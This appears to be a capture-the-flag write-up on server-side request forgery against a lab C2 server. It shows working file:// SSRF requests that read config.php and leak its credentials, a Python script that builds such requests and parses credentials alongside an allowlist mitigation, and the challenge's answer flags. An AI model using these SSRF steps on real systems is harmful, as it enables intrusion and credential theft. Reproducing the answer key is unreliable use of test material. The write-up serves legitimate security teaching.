Learning Objectives
- Understanding server-side request forgery (SSRF)
- The different types of SSRF used to exploit the vulnerability
- Prerequisites for exploiting the vulnerability
- How the attack works
- How to exploit the vulnerability
- Mitigation measures for protection
When the machine is up, add the hostname to your /etc/hosts file as described in the challenge.
You can then reach the C2 server at http://mcgreedysecretc2.thm
Exploiting the response: the url parameter is passed to the server-side fetch without any scheme or destination check, so if we point it at another file on the host using the file:// scheme, the server still fetches it for us. For example, http://10.10.100.212/getClientData.php?url=file:////var/www/html/index.php returns the source of index.php.
Now replace index.php with config.php:
http://10.10.100.212/getClientData.php?url=file:////var/www/html/config.php
The response contains the credentials:
$username = "mcgreedy";
$password = "mcgreedy!@#$%";
Use the above credentials to log in at http://mcgreedysecretc2.thm/
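As an added example (my own code, not part of the challenge or the C2 application), the script below automates the two steps above and adds the check a defender would want: it builds the file:// SSRF request for getClientData.php, pulls the $username/$password assignments out of a fetched config.php, and shows an allowlist validator that would have rejected the request. The endpoint name and the 10.10.100.212 address come from the page; the config.php text is a constructed sample; is_safe_fetch_url is an assumed mitigation, not what the application ships.

```python
"""SSRF helpers for the getClientData.php?url= pattern (added example, not the page's code)."""
import ipaddress
import re
import socket
from urllib.parse import urlencode, urlparse

# Constructed sample of what the leaked config.php looked like (values from the page).
SAMPLE_CONFIG = '<?php\n$username = "mcgreedy";\n$password = "mcgreedy!@#$%";\n'


def ssrf_file_url(base: str, path: str) -> str:
    """Build the SSRF request that makes the server read a local file.

    Uses the same four-slash form as the page (file:////var/...), which PHP's
    file:// wrapper accepts. ':' and '/' are left unencoded so the URL matches
    what was typed into the browser.
    """
    target = "file:///" + path
    return f"{base.rstrip('/')}/getClientData.php?" + urlencode({"url": target}, safe=":/")


def parse_php_credentials(php_source: str) -> dict:
    """Extract $name = "value"; assignments from leaked PHP source."""
    pattern = re.compile(r'\$(\w+)\s*=\s*(["\'])(.*?)\2\s*;')
    return {name: value for name, _quote, value in pattern.findall(php_source)}


def is_safe_fetch_url(url: str, resolve=socket.gethostbyname) -> bool:
    """Assumed mitigation: allow only http(s) to globally routable hosts.

    Blocks file://, gopher://, dict:// etc. by scheme, then rejects loopback,
    link-local (including 169.254.169.254 metadata), private and multicast
    targets. `resolve` is injectable so the check can be tested offline; in
    production the fetcher must also connect to the *resolved* IP rather than
    re-resolving the name, or DNS rebinding bypasses this check.
    """
    parts = urlparse(url)
    if parts.scheme not in ("http", "https"):
        return False
    host = parts.hostname  # strips userinfo, so http://evil@127.0.0.1/ is seen as 127.0.0.1
    if not host or host == "localhost" or host.endswith(".localhost"):
        return False
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        try:
            ip = ipaddress.ip_address(resolve(host))
        except (OSError, ValueError):
            return False
    return ip.is_global and not ip.is_multicast


if __name__ == "__main__":
    print(ssrf_file_url("http://10.10.100.212", "/var/www/html/config.php"))
    print(parse_php_credentials(SAMPLE_CONFIG))
    for u in ("file:////var/www/html/config.php", "http://127.0.0.1/", "http://8.8.8.8/"):
        print(u, "->", "allowed" if is_safe_fetch_url(u) else "blocked")
```

Run it against a live target by sending the URL from ssrf_file_url with any HTTP client and feeding the response body to parse_php_credentials; the validator is the piece that belongs in the application, not the exploit.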
QUESTIONS
- Is SSRF the process in which the attacker tricks the server into loading only external resources (yea/nay)?
ANSWER
nay
- What is the C2 version?
ANSWER
1.1
- What is the username for accessing the C2 panel?
ANSWER
mcgreedy
- What is the flag value after accessing the C2 panel?
ANSWER
THM{EXPLOITED_31001}
- What is the flag value after stopping the data exfiltration from the McSkidy computer?
ANSWER
THM{AGENT_REMOVED_1001}
To get this flag, remove the McSkidy PC agent from the C2 panel.